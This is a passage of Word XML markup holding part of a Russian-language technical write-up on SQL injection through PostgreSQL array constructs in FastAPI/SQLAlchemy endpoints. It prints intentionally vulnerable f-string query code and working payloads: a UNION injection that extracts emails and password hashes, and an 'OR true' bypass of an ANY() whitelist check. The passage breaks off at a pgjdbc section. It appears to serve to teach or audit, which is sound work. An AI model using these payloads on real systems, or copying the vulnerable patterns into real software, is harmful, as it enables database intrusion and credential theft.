        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>необычно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для классических injection-сканеров (они ищут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE col = '...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE col = ANY(string_to_array('...'))</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A745230" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — type-confusion: scalar в array-контексте</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B81D55A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: код ожидает array, но не валидирует тип параметра. psycopg2 принимает любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-like объект; если приложение передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>один scalar вместо list</w:t>
      </w:r>
      <w:r>
        <w:t>, поведение зависит от driver и SQL-форматирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE2B656" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/users/role")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A79D682" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def by_role(role_ids: list[int], session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F272E30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text("SELECT * FROM users WHERE role_id = ANY(:roles)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23D607" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q, {"roles": role_ids})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D6CEA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C24C68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь параметризация через bind variable выглядит безопасно. Но FastAPI принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role_ids</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> из query string как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?role_ids=1&amp;role_ids=2&amp;role_ids=3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Python list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[1, 2, 3]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA2206" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если атакующий передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>один параметр</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?role_ids=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, FastAPI делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (single-element list). Без проблем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF81DC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если атакующий передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>строку</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?role_ids=1+OR+1=1</w:t>
      </w:r>
      <w:r>
        <w:t>, FastAPI пытается parsing как int → 400 status (валидация Pydantic). Bypass: использовать query-string без типизации (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list[str]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>list[int]</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389ABD06" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/users/role")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23525A56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def by_role(role_ids: list[str], session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29604FD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # uses raw text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE3A03A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT * FROM users WHERE role_id = ANY(ARRAY[{','.join(role_ids)}])")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D86C8F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D82A75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.fetchall()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE1A0F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?role_ids=1&amp;role_ids=2)+UNION+SELECT+1,email,password_hash+FROM+users--</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E93B75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>','.join(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> получается: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1, 2) UNION SELECT 1, email, password_hash FROM users--</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059AF0E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24181832" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE role_id = ANY(ARRAY[1, 2) UNION SELECT 1, email, password_hash FROM users--])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6506F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Классическая UNION-injection через ARRAY-constructor. Особый случай — list-coalescing на стороне Python без валидации каждого элемента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC7F7AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — containment-bypass через user-controlled array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B75CDE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Контекст: эндпоинт проверяет, что user_id входит в whitelist разрешённых ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71686B15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALLOWED_IDS = [1, 2, 3, 4, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0FAF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B07C232" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/users/profile/{user_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B1DF6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def profile(user_id: int, extra_ids_array: str, session: AsyncSession = Depends(get_session)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D4CAE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # extra_ids_array — pre-quoted PG array literal, e.g. '{6,7,8}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53783716" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E631EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        SELECT * FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B15BF91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE id = {user_id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62E42E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        AND id = ANY(ARRAY{ALLOWED_IDS}::int[] || '{extra_ids_array}'::int[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8B5FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCA9FBA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(q)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E5CF0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63205022" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extra_ids_array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ожидается как PG array literal — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'{6,7,8}'</w:t>
      </w:r>
      <w:r>
        <w:t>. Атакующий контролирует строку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AF0662" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extra_ids_array</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94DC3A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{99}'::int[] OR true OR ARRAY[1]='{1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD19C39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736319FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE8CC3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id = 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF00504" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND id = ANY(ARRAY[1,2,3,4,5]::int[] || '{99}'::int[] OR true OR ARRAY[1]='{1}'::int[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFD67E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Из-за operator precedence, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> короткозамыкает всю WHERE-condition — возвращает все строки. Apparent ANY-containment-check обойден.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8725A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload D — driver-specific: pgjdbc unnest expansion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBBC491" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст: pgjdbc-приложение использует named-parameter library, которая разворачивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:param</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IN-список в indivudual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>-bindings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0770CD2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
